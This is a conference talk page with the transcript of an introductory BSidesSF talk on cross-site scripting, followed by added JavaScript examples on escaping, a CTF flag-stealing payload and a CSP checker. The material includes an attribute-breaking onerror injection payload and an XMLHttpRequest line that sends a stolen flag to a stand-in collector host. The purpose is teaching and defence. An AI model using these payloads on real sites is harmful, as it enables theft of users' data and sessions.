
Cross Site Scripting 101

BSidesSF · 2023 · 18:01 · 294 views · Published 2023-05
Speakers: Niru Ragupathy
Category: Technical
Difficulty: Intro
Team: Red
About this talk
An introductory exploration of cross-site scripting (XSS) vulnerabilities in web applications. The talk covers the three main XSS types—reflected, stored, and DOM-based—explains how context matters when crafting payloads, and demonstrates practical mitigation strategies. Attendees work through beginner-friendly CTF challenges to understand XSS exploitation and defensive techniques like template auto-escaping and Content Security Policy.
Original YouTube description
Cross Site Scripting 101, Niru Ragupathy. Are you new to web application security? Are you curious about XSS? Then this is the talk for you! Join us for a quick overview of XSS and a walkthrough of a 101 XSS challenge from this year's BSidesSF CTF. https://bsidessf2023.sched.com/event/1J5fU/cross-site-scripting-101
Transcript [en]

Hey everyone, I'm Niru, we're gonna kick off the village talk right now. I think I'm getting feedback from this one. Okay, cool. So hey, I'm Niru, we're gonna kick off the talk right now. Today's talk is about cross-site scripting. It is a 101 talk, so if you're here expecting in-depth stuff about cross-site scripting, this is not the talk for you, but if you're here just to get to know what XSS is and try your hand at a beginner-friendly CTF challenge, you've come to the right talk. Before I kick things off I do want to give a shout out to my colleagues Jenna, David and Koto, whose slides I've

liberally used here, and a big shout out to them for letting me borrow their slides. So a brief intro: I'm Niru, I'm a security engineer at Google. My day job is to break into things as a red teamer. In my free time I do try to write CTF challenges, be it web or mobile or cloud. I'm also one of the core organizers of the BSidesSF CTF, so you'll probably see me at the CTF room; swing by there. If you have any questions after the talk, feel free to drop in there and I'm happy to field all of them. Cool, with that let's dive into XSS. Web kind of has its own different class

of vulnerabilities, which is not surprising, right? Like, it kind of sprouted out of nowhere, it became a really big thing, and security has been running behind that carriage since it started. One of the classes of vulnerabilities that you see a lot in web is injection-style vulnerabilities. What does that mean? This typically happens when user data is taken and just plopped in and treated as code. So it happens when user-supplied data isn't treated as data but is treated as code, and XSS is just a type of injection vulnerability which is dealing with JavaScript. So attacker-given JavaScript is added to the request, it goes to the server, comes back in the response,

that's at core what XSS is. So let's take this example here. You can see that the title is something that the user controls, right? It can be something as innocuous as, let's say, Corgi, because corgis are awesome and everyone should love corgis. So let's say we put Corgi in there; it gets plopped right into the header field and you see it in the response. But not all people using your app are good people; some of them might try breaking into it. So what happens if they try to plug in JavaScript? Let's use the infamous alert box that everyone loves to use in XSS. If you're not escaping your responses or the user-provided data,

it's just going to come back in the response and the browser goes, well, this is JavaScript, I'm gonna render it. It doesn't care who supplied the JavaScript; as long as it shows up, the browser is just going to render it. So this particular type of injection issue is what XSS is, and at its core, like we just discussed, it happens when user-supplied data is treated as code and not as data. At the end of the day the browser doesn't care what's being supplied to it; it's your job as an application developer to actually make sure that it's properly escaped. Before we jump into XSS, one of the things that we need to dive into is

context, because this is really important for you to understand how to write XSS payloads that work. As you can see, a web page kind of has a lot of different contexts: you have HTML context, you have URL context, you have JavaScript context. It gets really confusing really fast, and depending on where your data ends up, as an attacker you need to make sure you understand what that context is and that you can run your payload within that context. One of the things you'll also notice is you can have nested contexts as well. And what do you do as someone who's writing a web app, do you try to juggle all these rules in your head? The

short answer is no, and that's where we'll talk about template systems towards the end for mitigations. But enough about trying to protect things; we came to this talk to try and understand how XSS works and how to break things, so let's get back to that.

Let's pick a very simple example and let's walk through it to try and understand how to write an XSS payload. Here is a very simple image tag. The foobar is the user-supplied data and you control it. So if you as an attacker control that, how do you make this into an XSS? First things first, to write a payload that actually works you need to be in a JavaScript context, because you need to be able to run your code, and right now where you're at is inside the name of an image, or the source of the image, which isn't really a JavaScript context. So this is not going to be useful for us. So first things first, let's get out of this

context and enter a new one. All you have to do is add that little quote there, so you get out of this context. Right now, next up, great, this is not a JavaScript context, we can't run our payload here, but we can make it a JavaScript context, and you're inside an image tag, so why not leverage event handlers? So let's say we add an image that doesn't exist and we just say onerror, you're going to do what I say you should do. So now that we've closed the quotes, we're opening a new context with onerror and a quote. Now comes the fun part: this is where you write your actual payload, since you're

in the JavaScript context. Fine, let's start with the alert box; I think that's where all of us start our XSS payloads. Let's do the infamous alert box. So we added that. This is an optional step: you've already achieved XSS, this will run if the user-supplied data isn't properly escaped, this is endgame. But you can go a step further. Right now what's going to happen is that .png closing brace is going to show up on the web page. You don't want that. Don't be sloppy, be better, hide your tracks. So how do you hide your tracks? You can do something as simple as just introduce an additional parameter, a, because a is the first letter, it's easy

to remember. We just put a equals quote, so now it kind of closes out all things. The end, right? So .png quote closes out, you get the end tag for the image, so you get no visible indicator that some shenanigans are up. Great, now that you understand roughly how to write payloads and what XSS is, let's dive into the different types of XSS, because understanding the different types of XSS will help you understand where to look for XSS. The first one is reflected XSS. This is fairly simple: you as an attacker are supplying a JavaScript payload, it makes its way to the server and it comes right back to you, hence the name reflected. A good

example for this is a search query. In a search query, imagine entering the JavaScript payload; it makes its way to the server, comes back as "you searched for so and so", and that's a good example of places where the response is thrown right back to you. That's a good reflected XSS example. Next up is stored. Reflected was nice, it went to the server, came back, but what if I want to do something else, like what if I want to hit more people? You can't send the reflected XSS to someone and see it get executed, but stored XSS is kind of cooler, where you're giving the payload as an

attacker to the server, it gets stored in the database and it gets fetched every single time someone visits our page. A good example of this is, let's say you go to a forum, you find a place where you can inject this, you inject this payload, it gets stored in the database, and any time someone comes and visits that forum your comment is picked back up and served to them. So the main difference here is that it is actually stored on the server component. Finally comes DOM XSS. This one is different from the two types we just covered, where the server is typically not involved, so everything happens on the client side. A good example of this is

you get the pound sign oftentimes on the URL; that's the location hash, and this is actually never sent to the server. It's only ever viewed by the browser. It's oftentimes used to shift your view in a page; it can be used to change the colors on the page. So what happens is the user-supplied data is taken and it's actually processed by the JavaScript on the page itself and it's plugged into the page. So in this case you'll see that u is actually a parameter, it's a variable that's actually filled in with user-supplied data, and it's plugged all the way into the innerHTML and written back, right? So everything happens on the client side,

there's no server involvement here. So with this knowledge in mind you now know where to look for the various types of XSS. It is a pretty prevalent attack class, vulnerability class; you're probably going to stumble into it at some point. Obviously don't go willy-nilly and try these things; maybe try it through bug bounty programs, right, through CTFs. Be responsible with this knowledge. Now that you know how to find XSS and what the different types of XSS are, let's briefly also discuss how to mitigate XSS. At the end of the day, what we can do as people who write web apps is to make sure that user-controlled data, we don't trust it. We never trust user-controlled

data, and we always make sure that we use template systems that are going to do strict contextual auto-escaping for us, so that way you don't juggle any of the rules in your head; everything's taken care of for you by the template systems. The other thing which is really cool and is being introduced now is Trusted Types. Koto's actually the one who introduced it, and it's really cool for locking down risky functions that you're coming across in JavaScript. Finally, CSP. Think of this as a safety net: if everything goes wrong, CSP will hopefully catch you. But CSP is not a panacea; you can't use it as a substitute for using template systems or escaping the user content.

Cool, theory out of the way, let's jump into the demo. We'll be using web tutorial 1 right now. If you have your laptops feel free to follow along, or you can also try this later; we're going to keep this running until end of day tomorrow, or probably even further than that. So these web tutorial challenges 1, 2 and 3 are set up to be beginner-friendly, and the first one is very basic: you can give it a script alert(1) and it will absolutely work, there is no escaping that's happening on the server. So you can check out these challenges at ctf.bsidessf.net or you can just hit that URL directly. I will leave the slide up

for a second in case people want to pull the URL. And next one, cool. The goal of this is not to get an alert box, because that's the other thing about XSS: you can use JavaScript, you can do anything you want. In this particular case we want you to focus on learning how to write good XSS payloads; it's not about writing the alert(1) box, we are better than that. What I want you to do is steal the xss one flag. However, there's a catch: you can't access the flag as players, only the admin can access the flag. So what do you do? This is a bit of a contrived example, but it works. So what we're trying to teach

you: any request that you send from your session will be sent to the admin, and the admin will do the exact same thing. So whatever you do, the admin is going to mirror that. So while you can't get the xss one flag, the admin can absolutely get that flag. So what do you do in terms of writing a payload? What you can do is you request the flag, you read the flag, and you add the additional step of writing the flag somewhere the attacker can read the flag. So it's now one additional step, but it does get you to the flag. Great. You might be like, hey, I don't know JavaScript, I do want to learn it later,

but can you break it down for me and explain how this payload works? Well, that's where XHR comes in. I know the slide colors are not great, but I'll upload the slides and you can all see it. But at the end of the day, what this payload does is it uses XMLHttpRequest to say, hey, I want the flag, give me the flag, and then it reads the contents of that response and then sends out another request. In this case the last request is to something you control as an attacker. So it says give me the flag, reads the flag, sends you the flag: three little steps to get you to the goal.

Great, you might be like, okay, I don't want to set up a server, I want the flag, what's the best way to get to the flag? You can use services like RequestBin, which is really for testing to see, hey, if I send a request can I just get it posted somewhere and I can just pick it up and do some testing. RequestBin is great for it. You can actually set up a public bin for it, and anything you send to it you will be able to view in the sidebar. With that, let's jump into the payload, and I'm going to mirror my display in a second.

Awesome, let's get that. You can see that I've already set up a RequestBin there. Let me copy that payload for now. First things first, let's actually go to this page. We tried to make this easy for you and said, hey, if you're going to look at CSP and you don't know what CSP is, we've actually built in hints here, so you can actually look at the CSP policy. Alternatively, if you are using Chrome, you can right click, Inspect, you'll see the Network tab, you can refresh it, you'll see the CSP headers right there. So let's actually copy the CSP headers for a second and plug it into this really nifty tool that our colleague wrote, which I right

now have the payload. I'm going to park the payload here and copy this.

So you can actually check that CSP policy using CSP Evaluator. Really helpful; it tells you what can possibly go wrong with your policy. If you're running any tests, so if you're writing apps that require CSP, do feel free to test this. And in general CSP is a lot easier if you build it from the ground up when you're writing the app versus plugging it in later, so just something to keep in mind. Cool, so we have this nifty little site; let's try the script alert payload first.

Voilà, there is an XSS now, and you can actually Inspect or View Source and you'll see that I am displaying the payload for you just so you know what you entered, but you can also see it's getting rendered. This is the part that's actually being run, because the browser just goes, oh, there's JavaScript, I should run this JavaScript. So now let's run our payload. What this is going to do is read the flag; it's going to request the flag, read the flag and send it to my RequestBin. Great, so if I view this and I inspect it,

refresh that, you'll see that I am requesting the flag, and you can also see that the flag is being sent to my service, my RequestBin. So this is working. So let me switch over to my RequestBin and you will see two requests here, because the admin mirrored my request and hopefully sent me back the flag. So that's about it, it's as simple as that. So now that you've tried your hand at this, go ahead, if it's your first time trying it, try web tutorial 1, try to solve this. Again, the solution is up; I'm also going to post the slides soon on my Twitter account, so feel free to look at it there.

One thing I would mention is web tutorial 2 is a slight variation of this, so try your hand at that as well, and again use CSP Evaluator, it's going to tell you where to poke holes. And web tutorial 3 does have a twist, but once you figure out XSS I think you can solve it. So that's pretty much it. Thank you everyone for coming to the talk. I will be at the CTF village for the rest of the time here and you're welcome to hang out there. That's it, so thank you.
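The image-tag walkthrough and the "context matters" point from the talk, as an added example (not the speaker's slides or code): the `<img src="foobar.png">` template rendered raw and with attribute escaping, the nested JavaScript-string context handled with its own escaper, and a small attribute tokenizer that shows which attributes a browser would actually end up with. Node.js, no dependencies; the payload string is the one built up in the talk.

```javascript
// Added example, not from the talk: the <img src="foobar.png"> walkthrough
// rendered with and without escaping, plus the nested JS-string context.

// The attacker input built up in the walkthrough: a quote to close src, an
// onerror handler as the new (JavaScript) context, and a dangling a=" so the
// trailing .png"> is swallowed into a harmless attribute value.
const PAYLOAD = '" onerror=alert(1) a="';

// Vulnerable: user data dropped straight into an attribute value.
function renderImgUnsafe(name) {
  return `<img src="${name}.png">`;
}

// Escaper for HTML text and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: the quote becomes &quot;, so the parser never leaves the src value.
function renderImgSafe(name) {
  return `<img src="${escapeHtml(name)}.png">`;
}

// Nested context: user data inside a JS string literal inside <script>.
// HTML escaping is the wrong tool here (the string would contain a literal
// "&lt;"); instead encode quotes, backslashes, angle brackets (so "</script>"
// cannot close the block) and line terminators as \uXXXX escapes.
function escapeJsString(s) {
  return String(s).replace(/[\\"'<>\n\r\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderScriptUnsafe(value) {
  return `<script>var u = "${value}";</script>`;
}

function renderScriptSafe(value) {
  return `<script>var u = "${escapeJsString(value)}";</script>`;
}

// Tiny tokenizer for a single tag: walks name=value pairs honouring quotes,
// which is enough to see which attributes the browser would parse out.
function attributeNames(tag) {
  const names = [];
  const re = /\s([^\s=>"'/]+)(?:=(?:"[^"]*"|'[^']*'|[^\s>]*))?/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Does the tag carry any on* event-handler attribute?
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith('on'));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderImgUnsafe(PAYLOAD), attributeNames(renderImgUnsafe(PAYLOAD)));
  console.log(renderImgSafe(PAYLOAD), attributeNames(renderImgSafe(PAYLOAD)));
  console.log(renderScriptSafe('</script><script>alert(1)</script>'));
}
```

The point of `attributeNames` is the same check you would do by hand in the browser's element inspector: the raw render yields `src`, `onerror` and `a` as separate attributes, while the escaped render yields only `src` with the whole payload inert inside its value. A real template system applies the right escaper per context automatically, which is why the talk recommends strict contextual auto-escaping over hand-written rules.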
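The three-step payload the talk describes (request the flag, read it, send it somewhere the attacker can read), written as an added example rather than the speaker's own solution script. The network call is passed in as a function so the logic can run offline against a constructed fake that, like the challenge, only serves the flag to the admin's session; `FLAG_URL` and `BIN_URL` are assumed placeholders, not the real challenge or RequestBin addresses.

```javascript
// Added example, not the speaker's payload: the request / read / send-out
// steps with the transport injected so they can be exercised offline.
const FLAG_URL = '/flag';                        // assumption: where the flag is served
const BIN_URL = 'https://bin.example.invalid/';  // assumption: attacker-controlled collector

// send(method, url) returns the response body as a string. It is synchronous
// here to keep the example testable; in a browser it would wrap XMLHttpRequest.
function exfilFlag(send) {
  const flag = send('GET', FLAG_URL);                       // 1. request, 2. read
  send('GET', BIN_URL + '?f=' + encodeURIComponent(flag));  // 3. send it out
  return flag;
}

// The same three steps as the text that would be injected into the page. Kept
// as a string so this file never runs it; a synchronous XHR keeps the order.
const BROWSER_PAYLOAD = [
  'var x = new XMLHttpRequest();',
  `x.open('GET', ${JSON.stringify(FLAG_URL)}, false);`,
  'x.send();',
  'var y = new XMLHttpRequest();',
  `y.open('GET', ${JSON.stringify(BIN_URL)} + '?f=' + encodeURIComponent(x.responseText), true);`,
  'y.send();',
].join('\n');

// Constructed fake network: the flag is only served to the admin session,
// which is the challenge rule that forces the extra step in the first place.
function makeFakeNetwork(isAdmin) {
  const requests = [];
  const send = (method, url) => {
    requests.push(`${method} ${url}`);
    if (url === FLAG_URL) return isAdmin ? 'CTF{constructed-flag}' : 'forbidden';
    return 'ok';
  };
  return { send, requests };
}

// Run the payload as the player, then as the admin who mirrors the request.
function demo() {
  const player = makeFakeNetwork(false);
  const admin = makeFakeNetwork(true);
  return {
    seenByPlayer: exfilFlag(player.send),
    seenByAdmin: exfilFlag(admin.send),
    adminRequests: admin.requests,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
  console.log(BROWSER_PAYLOAD);
}
```

The second request to the bin is a plain cross-origin GET, so the browser sends it even though the page's script cannot read the bin's response; that is all an exfiltration beacon needs. A CSP with a restrictive `connect-src` would block that XHR, which is why the demo has you read the challenge's CSP first.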
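The talk points at CSP Evaluator to see "what can possibly go wrong with your policy". As an added example (my own code, not that tool), here is a small checker for the script-related weaknesses it is best known for flagging, run over two constructed policies: a permissive one that looks reasonable at a glance, and a nonce-based strict one. The findings text is my wording.

```javascript
// Added example, not CSP Evaluator: a minimal checker for common script-src
// mistakes, run over constructed policy strings.
function parseCsp(header) {
  const policy = new Map();
  for (const directive of header.split(';')) {
    const [name, ...values] = directive.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name.toLowerCase(), values);
  }
  return policy;
}

function checkCsp(header) {
  const p = parseCsp(header);
  const findings = [];

  // script-src falls back to default-src when absent; with neither, any script loads.
  const scriptSrc = p.get('script-src') || p.get('default-src');
  if (!scriptSrc) {
    findings.push('no script-src or default-src: scripts may load from anywhere');
    return findings;
  }

  // Browsers ignore 'unsafe-inline' once a nonce or hash source is present,
  // so it only matters when it stands on its own.
  const hasNonceOrHash = scriptSrc.some((v) => /^'(nonce-|sha(256|384|512)-)/.test(v));
  if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("script-src allows 'unsafe-inline': injected <script> and on* handlers run");
  }
  if (scriptSrc.includes("'unsafe-eval'")) {
    findings.push("script-src allows 'unsafe-eval': injected strings can reach eval()");
  }
  if (scriptSrc.some((v) => ['*', 'http:', 'https:', 'data:'].includes(v))) {
    findings.push('script-src contains a wildcard or bare scheme source');
  }

  // object-src also falls back to default-src; anything but 'none' lets
  // plugin content execute script.
  const objectSrc = p.get('object-src') || p.get('default-src');
  if (!objectSrc || !objectSrc.includes("'none'")) {
    findings.push("object-src is not 'none'");
  }
  if (!p.has('base-uri')) {
    findings.push('base-uri missing: an injected <base> tag can redirect relative script URLs');
  }
  return findings;
}

// Constructed policies for illustration.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com";
const STRICT_CSP = "object-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; base-uri 'none'";

if (typeof require !== 'undefined' && require.main === module) {
  console.log('weak:', checkCsp(WEAK_CSP));
  console.log('strict:', checkCsp(STRICT_CSP));
}
```

Paste the `Content-Security-Policy` header value you read out of the browser's Network tab into `checkCsp` and you get the same kind of list the talk shows coming out of CSP Evaluator, which remains the tool to use for a full review; this checker covers only the script-execution directives. Note the checker says nothing about escaping: a strict policy would stop the `alert(1)` injection from executing, but the injection itself is still there, which is the speaker's point that CSP is a safety net rather than a substitute for auto-escaping templates.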